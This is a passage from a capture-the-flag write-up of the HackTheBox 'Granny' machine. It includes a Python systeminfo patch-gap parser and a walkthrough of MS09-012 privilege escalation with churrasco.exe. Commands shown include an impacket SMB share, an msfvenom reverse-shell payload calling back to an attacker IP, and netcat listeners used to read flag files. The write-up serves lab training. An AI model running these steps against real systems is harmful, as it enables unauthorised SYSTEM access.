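Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
"""

# Bulletin -> KB article, as printed in parentheses in the suggester output above.
SAMPLE_BULLETINS: Dict[str, str] = {
    "MS15-051": "3057191",
    "MS14-070": "2989935",
    "MS14-058": "3000061",
}

# Continuation lines such as "   [01]: Q147222" under a list-valued field.
ENTRY_RE = re.compile(r"^\s+\[\d+\]:\s*(\S+)")


@dataclass
class SysInfo:
    os_name: str = ""
    version: str = ""          # e.g. "5.2.3790"
    service_pack: int = 0
    arch: str = ""             # "x86" or "x64"
    hotfixes: List[str] = field(default_factory=list)


def parse_systeminfo(text: str) -> SysInfo:
    """Pull OS version, SP, architecture and the hotfix list out of systeminfo text."""
    info = SysInfo()
    in_hotfixes = False
    for line in text.splitlines():
        entry = ENTRY_RE.match(line)
        if entry and in_hotfixes:          # continuation lines under Hotfix(s):
            info.hotfixes.append(entry.group(1).upper())
            continue
        in_hotfixes = False                # any other line ends the hotfix block
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "OS Name":
            info.os_name = value
        elif key == "OS Version":
            m = re.match(r"(\d+\.\d+\.\d+)(?:\s+Service Pack\s+(\d+))?", value)
            if m:
                info.version = m.group(1)
                info.service_pack = int(m.group(2) or 0)
        elif key == "System Type":
            info.arch = "x64" if "x64" in value.lower() else "x86"
        elif key.startswith("Hotfix"):
            in_hotfixes = True
    return info


def kb_ids(info: SysInfo) -> Set[str]:
    """Normalise 'KB3057191' / 'Q147222' labels to bare article numbers."""
    return {re.sub(r"^(KB|Q)", "", h) for h in info.hotfixes}


def missing_bulletins(info: SysInfo, bulletins: Dict[str, str]) -> List[str]:
    """Bulletins whose KB is not installed, i.e. still candidate exploits."""
    installed = kb_ids(info)
    return sorted(b for b, kb in bulletins.items() if kb not in installed)


if __name__ == "__main__":
    granny = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(granny)
    print("missing:", missing_bulletins(granny, SAMPLE_BULLETINS))
```

With only Q147222 installed every bulletin comes back as missing, which is why the list above is so long. One caveat: systeminfo's hotfix list can be incomplete or show N/A, so on a real engagement cross-check it with wmic qfe get HotFixID before trusting the result.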

I worked through them from the top, but none of them panned out.
Searching on my own instead, churrasco.exe, which uses MS09-012, looked promising.
It is a tool that exploits a Windows Server 2003 vulnerability (MS09-012, Cesar Cerrudo's "token kidnapping") to escalate privileges (www.exploit-db.com). The relevant detail is the account we already hold: NETWORK SERVICE has SeImpersonatePrivilege, and on Server 2003 it can reach threads of services that carry SYSTEM tokens, so churrasco impersonates one of those tokens and spawns the command you give it as SYSTEM.

A ready-to-use binary build is here (github.com).

So just ship the binary over and run it. I tried PowerShell + wget like on Optimum, but PowerShell isn't available on this box.
So I had it fetch the file from an SMB share instead (the HTB Academy material helped a little here).
Stand up an SMB server in the directory holding churrasco.exe; impacket-smbserver does the job. Server 2003 only speaks SMB1, which is what impacket-smbserver serves by default, so no -smb2support flag is needed.

┌──(kali㉿kali)-[/var/www/html]
└─$ sudo impacket-smbserver smbDir $(pwd)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Connect to the share from Granny and run churrasco.
whoami comes back as nt authority\system, so privilege escalation works.

C:\WINDOWS\system32\inetsrv>\\10.10.14.2\smbDir\churrasco.exe whoami
\\10.10.14.2\smbDir\churrasco.exe whoami
nt authority\system

That alone isn't enough (it only ran whoami as SYSTEM), so next build a payload that connects back to nc on port 4444,
drop it in the SMB directory and mark it executable. The chmod +x is actually unnecessary: the Unix execute bit on the share means nothing to Windows, which goes by the .exe extension.

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo mv shell.exe /var/www/html                                                          
[sudo] password for kali:

┌──(kali㉿kali)-[/var/www/html]
└─$ chmod +x shell.exe     

On the Granny side, run the payload through churrasco from the share (there is a stray double backslash in the path below; Windows tolerated it).

C:\WINDOWS\system32\inetsrv>\\10.10.14.2\smbDir\churrasco.exe \\10.10.14.2\\smbDir\shell.exe
\\10.10.14.2\smbDir\churrasco.exe \\10.10.14.2\\smbDir\shell.exe

The flags should be around here by now (just experience at this point...). The paths contain spaces, so they need quoting:

type "C:\Documents and Settings\Lakis\Desktop\user.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"

Listening with nc, the connection kept dropping, so I typed fast and grabbed the flags. Long road.

┌──(kali㉿kali)-[~]
└─$ nc -vlnp 4444                                                                                                                                      
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1051
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\TEMP>type C:\Documents and Settings\Lakis\Desktop\user.txt
type C:\Documents and Settings\Lakis\Desktop\user.txt
The system cannot find the file specified.
Error occurred while processing: C:\Documents.
The system cannot find the file specified.
Error occurred while processing: and.
The system cannot find the path specified.


Note that the failure is not a missing file: cmd.exe split the unquoted path at its spaces and tried to process `C:\Documents` and `and` separately. Wrapping the path in double quotes avoids that; changing into the directory first, as below, sidesteps it too.

# (some output omitted)

C:\Documents and Settings\Lakis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Lakis\Desktop

04/12/2017  10:19 PM    <DIR>          .
04/12/2017  10:19 PM    <DIR>          ..
04/12/2017  10:20 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,090,950,656 bytes free

C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt

The session died here, so reconnect and go for the root flag.

┌──(kali㉿kali)-[~]
└─$ nc -vlnp 4444   
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1052
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

# (some output omitted)

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator

04/12/2017  09:48 PM    <DIR>          .
04/12/2017  09:48 PM    <DIR>          ..
04/12/2017  05:28 PM    <DIR>          Desktop
04/12/2017  05:12 PM    <DIR>          Favorites
04/12/2017  05:12 PM    <DIR>          My Documents
04/12/2017  04:42 PM    <DIR>          Start Menu
04/12/2017  04:44 PM                 0 Sti_Trace.log
               1 File(s)              0 bytes
               6 Dir(s)  18,090,934,272 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt 

The privilege escalation part really wore me down. Metasploit might have been easier.
Maybe Grandpa next...